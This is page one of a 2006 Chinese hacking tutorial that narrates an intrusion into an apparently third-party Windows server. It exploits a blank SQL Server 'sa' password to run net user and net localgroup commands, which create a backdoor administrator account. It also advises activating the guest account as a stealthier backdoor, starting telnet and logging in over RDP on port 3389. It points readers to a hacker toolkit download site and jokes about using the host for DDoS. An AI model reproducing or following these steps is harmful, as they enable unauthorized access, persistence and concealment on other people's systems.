SQL配合3389的一次入侵

减小字体 增大字体 作者:佚名  来源:www.zmke.com  发布时间:2006-10-07 01:01:02

昨天晚上,朋友给我一台漏洞颇多的主机,哈哈,我没别的意思,只是练一下手而已,顺便把过程写下来,这台主机漏洞实在多,CGI漏洞就30多个,SQL的sa这个用户的密码为空,开的端口12个,这台主机是100M的宽带,用来做“轰炸鸡”不错,一看这个网站,靠,居然是文化信息网,不敢打歪主意了,先进去看看,打开SqlExec.exe,这是连接数据库用的工具,收藏在“黑客入侵必备工具包”(下载地址http://www.sangel.net)里,在HOST那里填上对方IP,用户名为sa,密码为空就不用填,然后点Connnect就开始连接了,如图:

  


  这样就表示连接成功,大家都知道sa是SQL数据库的管理员,所以可以执行任意指令,我们就在

  DOS Commamd输入:

  net user root 521521 /add

  net localgroup administrators root /add

  文章看多了也应该知道这是什么意思了吧?不用说了。看到成功的提示了,如图:

  

  这样就留下后门了,看看是否填加了?输入:net user。哈哈,添加成功了,如图:

  

  但我还是建议不要添加用户,否则很容易被看穿,所以我建议你在guest这个用户上做手脚,输入下面命令:

  net user guest /adtive:yes

  net user guest 521521

  net localgroup administrators guest /add

  就这样就激活了guest这个帐号,并把它的密码设为521521,还添加进管理员组,如果帐号本来就是的活的,就直接输入倒数两行命令就可以了,别忘了,如果目标主机没有开23端口的话,记得为它运行远程登陆服务,输入:net start telnet。现在我们有管理员帐号了,想做什么还不随心所欲?这台主机还开了3389端口,赶快用“终端服务客户端”(收藏在“黑客入侵必备工具包”里面),连接上去,就像操作自己的电脑一样,如下图:

  

  点“连接”后过一会儿成功的话就到windows2000的登陆窗口,输入用户名和密码进去吧,如图:

  

  点年“确定”一会就进去了,首先映入眼帘的是桌面,如图:

  

[1] [2]  下一页

Tags:

作者:佚名
  • 好的评价 如果您觉得此文章好,就请您
      0%(0)
  • 差的评价 如果您觉得此文章差,就请您
      0%(0)

文章评论评论内容只代表网友观点,与本站立场无关!

   评论摘要(共 0 条,得分 0 分,平均 0 分) 查看完整评论